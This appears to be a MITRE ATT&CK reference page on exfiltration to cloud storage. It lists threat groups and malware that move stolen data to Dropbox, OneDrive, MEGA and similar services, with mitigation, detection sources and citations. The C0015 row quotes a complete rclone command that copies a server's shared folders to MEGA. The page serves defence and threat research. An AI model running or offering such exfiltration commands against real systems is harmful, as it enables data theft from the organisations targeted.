T1567.002 Exfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
Item | Value |
---|---|
ID | T1567.002 |
Sub-techniques | T1567.001, T1567.002, T1567.003 |
Tactics | TA0010 |
Platforms | Linux, Windows, macOS |
Version | 1.1 |
Created | 09 March 2020 |
Last Modified | 30 August 2022 |
Procedure Examples
ID | Name | Description |
---|---|---|
S0635 | BoomBox | BoomBox can upload data to dedicated per-victim folders in Dropbox.14 |
S0651 | BoxCaon | BoxCaon has the capability to download folders’ contents on the system and upload the results back to its Dropbox drive.7 |
C0015 | C0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M .1 |
G0114 | Chimera | Chimera has exfiltrated stolen data to OneDrive accounts.24 |
S0660 | Clambling | Clambling can send files from a victim’s machine to Dropbox.1011 |
G0142 | Confucius | Confucius has exfiltrated victim data to cloud storage service accounts.18 |
S1023 | CreepyDrive | CreepyDrive can use cloud services including OneDrive for data exfiltration.4 |
S0538 | Crutch | Crutch has exfiltrated stolen data to Dropbox.13 |
G1006 | Earth Lusca | Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.19 |
S0363 | Empire | Empire can use Dropbox for data exfiltration.3 |
G0046 | FIN7 | FIN7 has exfiltrated stolen data to the MEGA file sharing site.15 |
G0125 | HAFNIUM | HAFNIUM has exfiltrated data to file sharing sites, including MEGA.17 |
S0037 | HAMMERTOSS | HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.12 |
G1001 | HEXANE | HEXANE has used cloud services, including OneDrive, for data exfiltration.4 |
G0094 | Kimsuky | Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.16 |
G0065 | Leviathan | Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.2021 |
G1014 | LuminousMoth | LuminousMoth has exfiltrated data to Google Drive.26 |
S0340 | Octopus | Octopus has exfiltrated data to file sharing sites.5 |
C0022 | Operation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.2728 |
G1005 | POLONIUM | POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.4 |
S0629 | RainyDay | RainyDay can use a file exfiltration tool to upload specific files to Dropbox.6 |
S1040 | Rclone | Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.21 |
S0240 | ROKRAT | ROKRAT can send collected data to cloud storage services such as PCloud.89 |
G0027 | Threat Group-3390 | Threat Group-3390 has exfiltrated stolen data to Dropbox.10 |
G0010 | Turla | Turla has used WebDAV to upload stolen USB files to a cloud drive.22 Turla has also exfiltrated stolen files to OneDrive and 4shared.23 |
G0128 | ZIRCONIUM | ZIRCONIUM has exfiltrated stolen data to Dropbox.25 |
Mitigations
ID | Mitigation | Description |
---|---|---|
M1021 | Restrict Web-Based Content | Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services. |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Access |
DS0029 | Network Traffic | Network Connection Creation |
References
-
DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022. ↩↩
-
Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022. ↩
-
Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. ↩
-
Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. ↩↩↩
-
Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. ↩
-
Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021. ↩
-
CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021. ↩
-
Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022. ↩
-
Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021. ↩
-
Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. ↩↩
-
Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021. ↩
-
FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. ↩
-
Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020. ↩
-
MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. ↩
-
Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. ↩
-
An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. ↩
-
MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. ↩
-
Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group’s Cyberespionage Operations. Retrieved December 26, 2021. ↩
-
Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022. ↩
-
Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018. ↩
-
FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. ↩
-
Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019. ↩
-
Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. ↩
-
Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021. ↩
-
Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021. ↩
-
Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022. ↩
-
Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021. ↩
-
ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021. ↩